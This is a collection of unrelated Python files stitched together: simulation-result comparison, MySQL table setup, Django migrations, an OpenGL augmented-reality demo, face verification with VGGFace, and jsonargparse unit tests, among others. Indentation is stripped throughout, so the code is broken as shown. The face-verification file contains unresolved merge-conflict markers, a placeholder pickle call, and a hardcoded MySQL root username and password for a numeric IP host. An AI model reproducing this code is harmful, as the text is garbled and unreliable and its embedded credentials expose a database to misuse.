checkStats('z', 104, estRow1, estRow2)
checkSizes('h', 107, estRow1, estRow2)
checkStats('h', 110, estRow1, estRow2)
checkSizes('yupd', 113, estRow1, estRow2)
checkStats('yupd', 116, estRow1, estRow2)
checkSizes('x1', 119, estRow1, estRow2)
checkStats('x1', 122, estRow1, estRow2)
checkSizes('xupd', 125, estRow1, estRow2)
checkStats('xupd', 128, estRow1, estRow2)
checkSizes('P4', 131, estRow1, estRow2)
checkStats('P4', 134, estRow1, estRow2)
checkSizes('P5', 137, estRow1, estRow2)
checkStats('P5', 140, estRow1, estRow2)
checkSizes('Pupd', 143, estRow1, estRow2)
checkStats('Pupd', 146, estRow1, estRow2)
checkDiff(estRow1[149], estRow2[149], 'Measurement vmag min')
checkDiff(estRow1[150], estRow2[150], 'Measurement vmag max')
checkDiff(estRow1[151], estRow2[151], 'Measurement vmag mean')
checkDiff(estRow1[152], estRow2[152], 'Estimate vmag min')
checkDiff(estRow1[153], estRow2[153], 'Estimate vmag max')
checkDiff(estRow1[154], estRow2[154], 'Estimate vmag mean')
checkDiff(estRow1[155], estRow2[155], 'Estimate vmag percent error')
print('Estimate vmag percent error for timestamp sim1: ' + str(round(float(estRow1[155]), 4)) + ', sim2: ' + str(round(float(estRow2[155]), 4)), flush=True)
sumPerErr1 += float(estRow1[155])
sumPerErr2 += float(estRow2[155])
# break after first timestamp for debugging
#if itCount == 1:
# break
except:
break
fp1.close()
fp2.close()
meanPerErr1 = sumPerErr1/itCount
meanPerErr2 = sumPerErr2/itCount
print('\nMean estimate vmag percent error over all timestamps sim1: ' + str(round(meanPerErr1, 4)) + ', sim2: ' + str(round(meanPerErr2, 4)), flush=True)
print('End ESTIMATE accuracy comparison\n', flush=True)
print('Begin ESTIMATE performance comparison:', flush=True)
fp1 = open(simDir1 + 'est_perf.csv', 'r')
fp2 = open(simDir2 + 'est_perf.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_perf.csv headers being compared--exiting!\n', flush=True)
exit()
itCount = 0
sumEstTime1 = 0.0
sumEstTime2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
checkDiff(estRow1[1], estRow2[1], 'Supd inverse time')
checkDiff(estRow1[2], estRow2[2], 'Supd inverse virtual memory')
checkDiff(estRow1[3], estRow2[3], 'Kupd multiply time')
checkDiff(estRow1[4], estRow2[4], 'Kupd multiply virtual memory')
checkDiff(estRow1[5], estRow2[5], 'Total estimate time')
checkDiff(estRow1[6], estRow2[6], 'Total estimate virtual memory')
sumEstTime1 += float(estRow1[5])
sumEstTime2 += float(estRow2[5])
except:
break
fp1.close()
fp2.close()
meanEstTime1 = sumEstTime1/itCount
meanEstTime2 = sumEstTime2/itCount
print('\nMean total estimate time sim1: ' + str(round(meanEstTime1, 4)) + ', sim2: ' + str(round(meanEstTime2, 4)), flush=True)
checkDiff(meanEstTime1, meanEstTime2, 'Mean total estimate time', False, True)
print('End ESTIMATE performance comparison\n', flush=True)
print('Begin ESTIMATE vs. measurement for ' + opts.sim_dir1 + ':', flush=True)
fpM = open(simDir1 + 'meas_vmagpu.csv', 'r')
fpE = open(simDir1 + 'est_vmagpu.csv', 'r')
readerM = csv.reader(fpM)
readerE = csv.reader(fpE)
headerM = next(readerM)
headerE = next(readerE)
if headerM != headerE:
print('Mismatched meas_vmagpu.csv and est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(headerM)-1
itCount = 0
sumCount = 0
sumMeasVMag = 0.0
sumEstVMag = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
rowM = next(readerM)
rowE = next(readerE)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + rowM[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(rowM[inode], rowE[inode],
headerM[inode] + ' estimate vs. measurement')
sumMeasVMag += float(rowM[inode])
sumEstVMag += float(rowE[inode])
sumCount += numNodes
except:
break
fpM.close()
fpE.close()
meanMeasVMag = sumMeasVMag/sumCount
meanEstVMag = sumEstVMag/sumCount
print('\nMean measurement vmag: ' + str(round(meanMeasVMag, 4)) + ', estimate vmag: ' + str(round(meanEstVMag, 4)), flush=True)
checkDiff(meanMeasVMag, meanEstVMag, 'Mean measurement vs. estimate vmag over all nodes and timestamps', False, True)
print('End ESTIMATE vs. measurement for ' + opts.sim_dir1 + '\n', flush=True)
print('Begin ESTIMATE vs. measurement for ' + opts.sim_dir2 + ':', flush=True)
fpM = open(simDir2 + 'meas_vmagpu.csv', 'r')
fpE = open(simDir2 + 'est_vmagpu.csv', 'r')
readerM = csv.reader(fpM)
readerE = csv.reader(fpE)
headerM = next(readerM)
headerE = next(readerE)
if headerM != headerE:
print('Mismatched meas_vmagpu.csv and est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(headerM)-1
itCount = 0
sumCount = 0
sumMeasVMag = 0.0
sumEstVMag = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
rowM = next(readerM)
rowE = next(readerE)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + rowM[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(rowM[inode], rowE[inode],
headerM[inode] + ' estimate vs. measurement')
sumMeasVMag += float(rowM[inode])
sumEstVMag += float(rowE[inode])
sumCount += numNodes
except:
break
fpM.close()
fpE.close()
meanMeasVMag = sumMeasVMag/sumCount
meanEstVMag = sumEstVMag/sumCount
print('\nMean measurement vmag: ' + str(round(meanMeasVMag, 4)) + ', estimate vmag: ' + str(round(meanEstVMag, 4)), flush=True)
checkDiff(meanMeasVMag, meanEstVMag, 'Mean measurement vs. estimate vmag over all nodes and timestamps', False, True)
print('End ESTIMATE vs. measurement for ' + opts.sim_dir2 + '\n', flush=True)
print('Begin ESTIMATE voltage magnitude comparison:', flush=True)
fp1 = open(simDir1 + 'est_vmagpu.csv', 'r')
fp2 = open(simDir2 + 'est_vmagpu.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_vmagpu.csv headers being compared--exiting!\n', flush=True)
exit()
numNodes = len(estHeader1)-1
itCount = 0
sumCount = 0
sumEstVMag1 = 0.0
sumEstVMag2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
for inode in range(1, numNodes+1):
checkDiff(estRow1[inode], estRow2[inode],
estHeader1[inode] + ' estimate')
sumEstVMag1 += float(estRow1[inode])
sumEstVMag2 += float(estRow2[inode])
sumCount += numNodes
except:
break
fp1.close()
fp2.close()
meanEstVMag1 = sumEstVMag1/sumCount
meanEstVMag2 = sumEstVMag2/sumCount
print('\nMean estimate vmag sim1: ' + str(round(meanEstVMag1, 4)) + ', sim2: ' + str(round(meanEstVMag2, 4)), flush=True)
checkDiff(meanEstVMag1, meanEstVMag2, 'Mean estimate vmag', False, True)
print('End ESTIMATE voltage magnitude comparison\n', flush=True)
if __name__ == "__main__":
_main()
|
import mysql.connector
import sys
class createdb_table:
def __int__(self):
self.database="Hindunews"
self.username=''
self.password=''
self.db_list=[]
self.connection=''
self.cursor=''
def user_input(self):
#import pdb;pdb.set_trace()
self.username=sys.argv[1]
self.password=sys.argv[2]
def set_up_db_connection(self):
#import pdb;pdb.set_trace()
self.connection=mysql.connector.connect(host="localhost",user="%s"%self.username,passwd="%s"%self.password)
self.cursor=self.connection.cursor()
def create_require_db_tables(self):
self.user_input()
self.set_up_db_connection()
self.cursor.execute("show databases;")
for db in self.cursor:
self.db_list.append(db[0].encode())
#import pdb;pdb.set_trace()
if self.database not in self.db_list:
self.cursor.execute("create database %s;"%self.database)
print("\n %s db created"%self.database)
self.cursor.execute("use %s;"%self.database)
create_tables=["create table National_news_details (sk_key varchar(500) primary key, News_headlines varchar(1000), News_intro varchar(2000), News_details varchar(50000), Country varchar(100),Date varchar(100),Updated_at varchar(200), News_url varchar(1000));"]
for query in create_tables:
self.cursor.execute(query)
print("\n")
print("Table created.................")
else:
print("%s db is already exist"%self.database)
self.cursor.execute("use %s;"%self.database)
self.cursor.execute("show tables;")
table_cursor=self.cursor.fetchall()
if not table_cursor:
create_tables=["create table National_news_details (sk_key varchar(500) primary key, News_headlines varchar(1000), News_intro varchar(2000), News_details varchar(50000), Country varchar(100),Date varchar(100),Updated_at varchar(200), News_url varchar(1000));"]
for query in create_tables:
self.cursor.execute(query)
print ("table created.......")
else:
print ("\n")
print("Table is already exist in DB",table_cursor)
self.connection.close()
object_=createdb_table()
object_.__int__()
object_.create_require_db_tables()
|
# Generated by Django 3.0.2 on 2020-01-31 07:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0016_auto_20200131_1226'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='voter',
new_name='voter1',
),
]
|
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import cv2
import sys
from PIL import Image
import numpy as np
from webcam import Webcam
from glyphs.constants import *
from objloader import *
us = True
if us is not True:
from glyphs.glyphs import Glyphs
else:
from detect_and_track import *
class AR:
# constants
INVERSE_MATRIX = np.array([[ 1.0, 1.0, 1.0, 1.0],
[-1.0,-1.0,-1.0,-1.0],
[-1.0,-1.0,-1.0,-1.0],
[ 1.0, 1.0, 1.0, 1.0]])
def __init__(self):
# initialise webcam and start thread
self.webcam = Webcam()
self.webcam.start()
# initialise detector
if us is not True:
self.glyphs = Glyphs()
else:
self.detector = Detector( model_path="new_icon_detector_model/keras_model.h5",
camera_matrix_path="camera_parameters.json")
# initialise shapes
self.cone = None
self.sphere = None
self.isShapeSwitch = False;
# initialise texture
self.texture_background = None
# initialise view matrix
self.view_matrix = np.array([])
# refine arg
self.deltaX = 0.5
self.deltaY = 0.3
self.deltaZ = 0.0
def initGL(self, Width, Height):
glClearColor(0.0, 0.0, 0.0, 0.0)
glClearDepth(1.0)
glDepthFunc(GL_LESS)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(33.7, 1.3, 0.1, 100.0)
glMatrixMode(GL_MODELVIEW)
# assign shapes
# self.cone = OBJ('resources/basic_object/cone.obj')
# self.sphere = OBJ('resources/basic_object/sphere.obj')
self.pikachu = OBJ('resources/Pikachu_B/Pikachu_B.obj')
self.skull = OBJ('resources/Skull/12140_Skull_v3_L2.obj')
# assign texture
glEnable(GL_TEXTURE_2D)
self.texture_background = glGenTextures(1)
self.texture_object = glGenTextures(1)
def buildViewMatrix(self, label, rvec, tvec):
# build view matrix
rmtx = cv2.Rodrigues(rvec)[0]
if label == 2: # skull
self.deltaX = 0.1 + 0.315
self.deltaY = 0.2 + 0.3
tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
elif label == 1: #pikachu
self.deltaX = 0.3
self.deltaY = 0.3
self.deltaZ = 1.1
tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
else:
self.deltaX = 0.4
self.deltaY = 0.3
tvec = tvec + np.array([[self.deltaX], [self.deltaY], [self.deltaZ]])
pass
# TODO
self.view_matrix = np.array( [[rmtx[0][0], rmtx[0][1], rmtx[0][2], tvec[0]],
[rmtx[1][0], rmtx[1][1], rmtx[1][2], tvec[1]],
[rmtx[2][0], rmtx[2][1], rmtx[2][2], tvec[2]],
[0.0 , 0.0 , 0.0 , 1.0 ]])
self.view_matrix = self.view_matrix * self.INVERSE_MATRIX
self.view_matrix = np.transpose(self.view_matrix)
def drawScene(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
# get image from webcam
image = self.webcam.get_current_frame()
# convert image to OpenGL texture format
bg_image = cv2.flip(image, 0)
bg_image = cv2.flip(bg_image, 1)
bg_image = Image.fromarray(bg_image)
ix = bg_image.size[0]
iy = bg_image.size[1]
bg_image = bg_image.tobytes("raw", "BGRX", 0, -1)
# create background texture
glBindTexture(GL_TEXTURE_2D, self.texture_background)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexImage2D(GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, bg_image)
# draw background
glBindTexture(GL_TEXTURE_2D, self.texture_background)
glPushMatrix()
glTranslatef(0.0,0.0,-10.0)
self.drawBackground()
glPopMatrix()
# handle glyphs
self.handleImage(image)
glutSwapBuffers()
def init_object_texture(self,image_filepath):
#THE COMMENTS FOR THE FOLLOWING STEPS ARE SAME AS IN THE ABOVE FUNCTION, THE ONLY DIFFERENCE IS, HERE INSTEAD OF USING CAMERA FRAME WE USE IMAGE FILES
tex = cv2.imread(image_filepath)
tex = cv2.flip(tex, 0)
tex = Image.fromarray(tex)
ix = tex.size[0]
iy = tex.size[1]
tex = tex.tobytes("raw","BGRX", 0, -1)
# if self.texture_object is None:
# self.texture_object = glGenTextures(1)
glActiveTexture(GL_TEXTURE0)
glBindTexture(GL_TEXTURE_2D, self.texture_object)
glEnable(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0,GL_RGBA, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, tex)
return None
def render3Dobj(self, label):
if label == 0:
self.init_object_texture("resources/basic_object/wave-textures.png")
glRotate(180, 0, 1, 0)
glutSolidTeapot(0.3) #HARCODE
elif label == 1:
glRotate(210, 0, 1, 0)
glRotate(90, 1, 0, 0)
glCallList(self.pikachu.gl_list)
glTranslatef(0.5, 0.0, 0.0)
elif label == 2:
glScalef(0.02, 0.02, 0.02)
glRotate(90, 0, 0, 1)
glRotate(90, 1, 0, 0)
glRotate(90, 0, 1, 0)
glCallList(self.skull.gl_list)
else:
pass
def handleImage(self, image):
# attempt to detect glyphs
results = []
if True:
if us is not True:
# results = self.glyphs.detect(image) #TODO create detector
results = self.glyphs.detect(cv2.flip(image, 1)) #TODO create detector
else:
results = self.detector.main_detect(image)
# except Exception as ex:
# print("Exception !: ")
# print(ex)
if not results:
return
for ret in results:
rvec, tvec, label = ret
# print(tvec)
# build view matrix
self.buildViewMatrix(label, rvec, tvec)
# load view matrix and draw shape
glPushMatrix()
glLoadMatrixf(self.view_matrix)
self.render3Dobj(label) #TODO
glPopMatrix()
def drawBackground(self):
# draw background
glBegin(GL_QUADS)
glTexCoord2f(0.0, 1.0); glVertex3f(-4.0, -3.0, 0.0)
glTexCoord2f(1.0, 1.0); glVertex3f( 4.0, -3.0, 0.0)
glTexCoord2f(1.0, 0.0); glVertex3f( 4.0, 3.0, 0.0)
glTexCoord2f(0.0, 0.0); glVertex3f(-4.0, 3.0, 0.0)
glEnd()
def main(self):
# setup and run OpenGL
glutInit()
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
glutInitWindowSize(640, 480)
glutInitWindowPosition(800, 400)
self.window_id = glutCreateWindow("OpenGL Window")
glutDisplayFunc(self.drawScene)
glutIdleFunc(self.drawScene)
self.initGL(640, 480)
glutMainLoop()
# run an instance of AR
ar = AR()
ar.main() |
# Generated by Django 2.2.11 on 2020-07-20 05:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_auto_20200719_1222'),
]
operations = [
migrations.AddField(
model_name='visitor',
name='message',
field=models.TextField(blank=True, max_length=5000, null=True),
),
]
|
#-------------------------------------------------------------------------------
# Name: Cursor01.py
# Purpose:
#
# Author: Matthew Rowland
#
# Created: 05-02-2019
# Copyright: (c) Rowland 2019
#-------------------------------------------------------------------------------
import os
import sys
import timeit
if len(sys.argv) != 4:
print "Usage: Cursor01.py <FeatureClass>"
sys.exit()
fc = sys.argv[1]
import arcpy
if not arcpy.Exists(fc):
sys.exit()
scriptFolder = os.path.dirname(os.path.abspath(__file__))
os.chdir(scriptFolder)
start=timeit.default_timer()
def getCityProvince():
rows = arcpy.SearchCursor(fc,"","", "NAME; PROV", "PROV D")
count = 0
currentState = ""
print "Name, Prov"
for row in rows:
if currentState != row.PROV:
currentState = row.PROV
count += 1
print u"{},{}".format(row.NAME, row.PROV)
print "There are {} cities in the above list".format(count)
del rows
del row
getCityProvince()
stop=timeit.default_timer()
seconds=stop-start
print "Seconds to execute:",seconds
|
#!/usr/bin/env python
##
## Copyright (C) Bitmain Technologies Inc.
## All Rights Reserved.
##
import argparse
import caffe
import os
import sys
import time
sys.path.append('../../calibration_tool/lib')
from Calibration import Calibration
#caffe.set_mode_gpu()
#caffe.set_device(0)
def run_calibration(args):
calibration_info = {
"model_name": args.model_name,
"in_prototxt": './{}/deploy.prototxt'.format(args.model_name),
"in_caffemodel": './{}/{}.caffemodel'.format(args.model_name, args.model_name),
"iteration": 20,
"enable_memory_opt": args.memory_opt,
"enable_calibration_opt": 1,
"histogram_bin_num": 2048,
"math_lib_path": '../../calibration_tool/lib/calibration_math.so'
}
print(calibration_info)
calib = Calibration(calibration_info)
calib.calc_tables()
calib.export_model('./{}/bmnet_{}_int8.caffemodel'.format(args.model_name, args.model_name))
calib.export_calirabtion_pb2('./{}/bmnet_{}_calibration_table'.format(args.model_name, args.model_name))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('model_name', metavar='model-name', help='model name')
parser.add_argument('--memory_opt', action='store_true', help='Enable memory optimization.')
args = parser.parse_args()
time_start = time.time()
run_calibration(args)
time_end = time.time()
print('Time: %fs' % (time_end - time_start))
sys.exit(0)
|
from Game.PPlay.window import *
from Game.game import *
from Game.main_menu import *
from Game.gameover import *
from Game.PPlay.sound import *
level = [0]
gui = Window(1024, 768)
gui.set_title("Stone Jump")
game = Game_itself(gui, level)
main_menu = Main_menu(gui, level, game)
gameover_menu = Gameover(gui, level, game)
sound = Sound("Assets/music.ogg")
sound.set_volume(80)
sound.set_repeat(True)
while True:
if level[0] == 0:
#case menu
gui.set_background_color((0, 0, 0))
main_menu.draw()
elif level[0] == 1:
if not sound.is_playing():
sound.play()
game.draw()
elif level[0] == 2:
#gameover
if (sound.is_playing()):
sound.stop()
scoreFinal = game.score_counter
score = game.score
score.x = 415
score.y = 450
gui.set_background_color((0, 0, 0))
gameover_menu.draw()
score.draw(scoreFinal)
gui.update()
|
import numpy as np
class GloveClassifier(object):
def __init__(self, source):
self.source = source
self.embeddings, self.word2vec, self.idx2word = self.read_glove_source()
def read_glove_source(self):
"""
The following function reads the Glove pre trained embeddings from a given source/file
and returns the embeddings, the words and their correspondence
:return:
"""
embeddings = []
word2vec = {}
idx2word = []
with open(self.source) as file:
lines = file.readlines()
for line in lines:
data = line.split()
word = data[0]
vector = np.asarray(data[1:], dtype='float32')
embeddings.append(vector)
idx2word.append(word)
word2vec[word] = vector
return embeddings, word2vec, idx2word
def fit_transform(self, data_list):
"""
The following function receives the data, the data format is list of lists and transform them
to tf idf bow model.
:param data: list of lists
:return: bow
"""
bow = []
for sentence in data_list:
words = sentence.split()
sentence_bow = [self.word2vec[word] for word in words if word in self.word2vec.keys()]
sentence_score = sum(sentence_bow)/len(sentence)
bow.append(sentence_score)
return bow
|
# face verification with the VGGFace2 model
from matplotlib import pyplot
from PIL import Image
from numpy import asarray
from scipy.spatial.distance import cosine
from mtcnn.mtcnn import MTCNN
from keras_vggface.vggface import VGGFace
from keras_vggface.utils import preprocess_input
<<<<<<< HEAD
=======
import pickle
>>>>>>> ac741ab04c63c715f41dc2c5943da666e9667858
import mysql.connector
# extract a single face from a given photograph
def extract_face(filename, required_size=(224, 224)):
# load image from file
pixels = pyplot.imread(filename)
# create the detector, using default weights
detector = MTCNN()
# detect faces in the image
results = detector.detect_faces(pixels)
# extract the bounding box from the first face
x1, y1, width, height = results[0]['box']
x2, y2 = x1 + width, y1 + height
# extract the face
face = pixels[y1:y2, x1:x2]
# resize pixels to the model size
image = Image.fromarray(face)
image = image.resize(required_size)
face_array = asarray(image)
return face_array
# extract faces and calculate face embeddings for a list of photo files
def get_embeddings(filenames):
# extract faces
faces = [extract_face(f) for f in filenames]
# convert into an array of samples
samples = asarray(faces, 'float32')
# prepare the face for the model, e.g. center pixels
samples = preprocess_input(samples, version=2)
# create a vggface model
model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg')
# perform prediction
yhat = model.predict(samples)
print(f'embedding shape = {yhat.shape}')
return yhat
# determine if a candidate face is a match for a known face
def is_match(known_embedding, candidate_embedding, thresh=0.5):
# calculate distance between embeddings
score = cosine(known_embedding, candidate_embedding)
if score <= thresh:
print('>face is a Match (%.3f <= %.3f)' % (score, thresh))
else:
print('>face is NOT a Match (%.3f > %.3f)' % (score, thresh))
# define filenames
# filenames should be the photos we take at real time
# maybe take a photo after raspberry pi scans a QRCode??
filenames = ['1.jpeg', '2.jpeg', '3.jpeg', '11.jpeg']
# get embeddings file filenames
embeddings = get_embeddings(filenames)
# define the target embedding
# get the faceEmbedding column from our database
# and get the numpy array be pickle.loads()
target_id = pickle.loads(......)
# verify by comparing with the target
print('start testing')
is_match(target_id, embeddings[0])
# filenames = ['1.jpeg']
# get embeddings file filenames
# embeddings = get_embeddings(filenames)
# define the target embedding
# get the faceEmbedding column from our database
# and get the numpy array be pickle.loads()
# target_id = pickle.loads(..)
mydb = mysql.connector.connect(
host="140.113.79.132",
user="root",
password="YYHuang",
database="covid_project"
)
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM covid_project.users_user")
myresult = mycursor.fetchall()
# verify by comparing with the target
print('start testing')
# is_match(target_id, embeddings[0])
|
"""Fixtures for pyintesishome_local."""
import pytest
from aioresponses import aioresponses
@pytest.fixture
def mock_aioresponse():
with aioresponses() as m:
yield m
|
# `box` let dict with advanced dot notation access.
from box import Box
import importlib
import json
import sys
def load(fp: object, lang: str = "json") -> dict:
'''Load a file to dictionary, format should be read from extension;
unless specified by the second argument `lang`
'''
mod = importlib.import_module(lang)
return Box(mod.load(fp))
def load_str(s: str, lang: str = "json") -> dict:
''' Load a string to dictionary, by default, json format
'''
mod = importlib.import_module(lang)
if hasattr(mod, "loads"):
return Box(mod.loads(s))
elif hasattr(mod, "load"):
return Box(mod.load(s))
return None
if __name__ == "__main__":
str_ = """{
"a": "b",
"c": 10
} """
print(load_str(str_))
print(load_str(str_).a)
str_ = """
invoice: 34843
date : 2001-01-23
"""
print(load_str(str_, "yaml"))
str_ = """
# This is a TOML document.
title = "TOML Example"
[owner]
name = "Tom Preston-Werner"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [ 8001, 8001, 8002 ]
connection_max = 5000
enabled = true
[servers]
# Indentation (tabs and/or spaces) is allowed but not required
[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"
[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
[clients]
data = [ ["gamma", "delta"], [1, 2] ]
# Line breaks are OK when inside arrays
hosts = [
"alpha",
"omega"
]
"""
print(load_str(str_, "toml"))
with open("tests/samples/a.json", "r") as fp:
content = load_str(fp.read(), "json")
print(content)
print(content.c)
with open("tests/samples/b.yaml", "r") as fp:
content = load(fp, "yaml")
print(content)
print(content.date)
with open("tests/samples/c.toml", "r") as fp:
content = load(fp, "toml")
print(content)
print(content.clients) |
from __future__ import annotations
import argparse
import platform
import pytest
from jsonargparse import Namespace, dict_to_namespace, namespace_to_dict
from jsonargparse._namespace import meta_keys
skip_if_no_setattr_insertion_order = pytest.mark.skipif(
platform.python_implementation() != "CPython",
reason="requires __setattr__ insertion order",
)
def test_shallow_dot_set_get():
ns = Namespace()
ns.a = 1
assert 1 == ns.a
assert ns == Namespace(a=1)
def test_shallow_attr_set_get_del():
ns = Namespace()
setattr(ns, "a", 1)
assert 1 == getattr(ns, "a")
assert ns == Namespace(a=1)
delattr(ns, "a")
with pytest.raises(AttributeError):
getattr(ns, "a")
def test_shallow_item_set_get_del():
ns = Namespace()
ns["a"] = 1
assert 1 == ns["a"]
assert ns == Namespace(a=1)
del ns["a"]
with pytest.raises(KeyError):
ns["a"]
def test_nested_item_set_get():
ns = Namespace()
ns["x.y.z"] = 1
assert Namespace(x=Namespace(y=Namespace(z=1))) == ns
assert 1 == ns["x.y.z"]
assert 1 == ns["x"]["y"]["z"]
assert Namespace(z=1) == ns["x.y"]
assert Namespace(z=1) == ns["x"]["y"]
ns["x.y"] = 2
assert 2 == ns["x.y"]
def test_nested_item_set_del():
ns = Namespace()
ns["x.y"] = 1
assert Namespace(x=Namespace(y=1)) == ns
del ns["x.y"]
assert Namespace(x=Namespace()) == ns
def test_get():
ns = Namespace()
ns["x.y"] = 1
assert 1 == ns.get("x.y")
assert Namespace(y=1) == ns.get("x")
assert 2 == ns.get("z", 2)
assert ns.get("z") is None
@pytest.mark.parametrize("key", [None, True, False, 1, 2.3])
def test_get_non_str_key(key):
ns = Namespace()
assert ns.get(key) is None
assert ns.get(key, "abc") == "abc"
def test_set_item_nested_dict():
ns = Namespace(d={"a": 1})
ns["d.b"] = 2
assert 2 == ns["d"]["b"]
@pytest.mark.parametrize("key", [None, True, False, 1, 2.3])
def test_contains_non_str_key(key):
ns = Namespace()
assert key not in ns
def test_pop():
ns = Namespace()
ns["x.y.z"] = 1
assert 1 == ns.pop("x.y.z")
assert ns == Namespace(x=Namespace(y=Namespace()))
def test_nested_item_invalid_set():
ns = Namespace()
with pytest.raises(KeyError):
ns["x."] = 1
with pytest.raises(KeyError):
ns["x .y"] = 2
def test_nested_key_in():
ns = Namespace()
ns["x.y.z"] = 1
assert "x" in ns
assert "x.y" in ns
assert "x.y.z" in ns
assert "a" not in ns
assert "x.a" not in ns
assert "x.y.a" not in ns
assert "x.y.z.a" not in ns
assert "x..y" not in ns
assert 123 not in ns
@skip_if_no_setattr_insertion_order
def test_items_generator():
ns = Namespace()
ns["a"] = 1
ns["b.c"] = 2
ns["b.d"] = 3
ns["p.q.r"] = {"x": 4, "y": 5}
items = list(ns.items())
assert items == [("a", 1), ("b.c", 2), ("b.d", 3), ("p.q.r", {"x": 4, "y": 5})]
@skip_if_no_setattr_insertion_order
def test_keys_generator():
ns = Namespace()
ns["a"] = 1
ns["b.c"] = 2
ns["b.d"] = 3
ns["p.q.r"] = {"x": 4, "y": 5}
keys = list(ns.keys())
assert keys == ["a", "b.c", "b.d", "p.q.r"]
@skip_if_no_setattr_insertion_order
def test_values_generator():
ns = Namespace()
ns["a"] = 1
ns["b.c"] = 2
ns["b.d"] = 3
ns["p.q.r"] = {"x": 4, "y": 5}
values = list(ns.values())
assert values == [1, 2, 3, {"x": 4, "y": 5}]
def test_namespace_from_dict():
dic = {"a": 1, "b": {"c": 2}}
ns = Namespace(dic)
assert ns == Namespace(a=1, b={"c": 2})
def test_as_dict():
ns = Namespace()
ns["w"] = 1
ns["x.y"] = 2
ns["x.z"] = 3
ns["p"] = {"q": Namespace(r=4)}
assert ns.as_dict() == {"w": 1, "x": {"y": 2, "z": 3}, "p": {"q": {"r": 4}}}
assert Namespace().as_dict() == {}
def test_as_flat():
ns = Namespace()
ns["w"] = 1
ns["x.y.z"] = 2
flat = ns.as_flat()
assert isinstance(flat, argparse.Namespace)
assert vars(flat) == {"w": 1, "x.y.z": 2}
def test_clone():
ns = Namespace()
pqr = {"x": 4, "y": 5}
ns["a"] = 1
ns["p.q.r"] = pqr
assert ns["p.q.r"] is pqr
assert ns.clone() == ns
assert ns.clone()["p.q.r"] is not pqr
assert ns.clone()["p.q"] is not ns["p.q"]
def test_update_shallow():
ns_from = Namespace(a=1, b=None)
ns_to = Namespace(a=None, b=2, c=3)
ns_to.update(ns_from)
assert ns_to == Namespace(a=1, b=None, c=3)
def test_update_invalid():
ns = Namespace()
with pytest.raises(KeyError):
ns.update(123)
def test_init_from_argparse_flat_namespace():
argparse_ns = argparse.Namespace()
setattr(argparse_ns, "w", 0)
setattr(argparse_ns, "x.y.a", 1)
setattr(argparse_ns, "x.y.b", 2)
setattr(argparse_ns, "z.c", 3)
ns = Namespace(argparse_ns)
assert ns == Namespace(w=0, x=Namespace(y=Namespace(a=1, b=2)), z=Namespace(c=3))
def test_init_invalid():
with pytest.raises(ValueError):
Namespace(1)
with pytest.raises(ValueError):
Namespace(argparse.Namespace(), x=1)
def test_namespace_to_dict():
ns = Namespace()
ns["w"] = 1
ns["x.y"] = 2
ns["x.z"] = 3
dic1 = namespace_to_dict(ns)
dic2 = ns.as_dict()
assert dic1 == dic2
assert dic1 is not dic2
def test_dict_to_namespace():
ns1 = Namespace(a=1, b=Namespace(c=2), d=[Namespace(e=3)])
dic = {"a": 1, "b": {"c": 2}, "d": [{"e": 3}]}
ns2 = dict_to_namespace(dic)
assert ns1 == ns2
def test_use_for_kwargs():
def func(a=1, b=2, c=3):
return a, b, c
kwargs = Namespace(a=4, c=5)
val = func(**kwargs)
assert val == (4, 2, 5)
def test_shallow_clashing_keys():
ns = Namespace()
assert "get" not in ns
exec("ns.get = 1")
assert "get" in ns
assert ns.get("get") == 1
assert dict(ns.items()) == {"get": 1}
ns["pop"] = 2
assert ns["pop"] == 2
assert ns.as_dict() == {"get": 1, "pop": 2}
assert ns.pop("get") == 1
assert dict(**ns) == {"pop": 2}
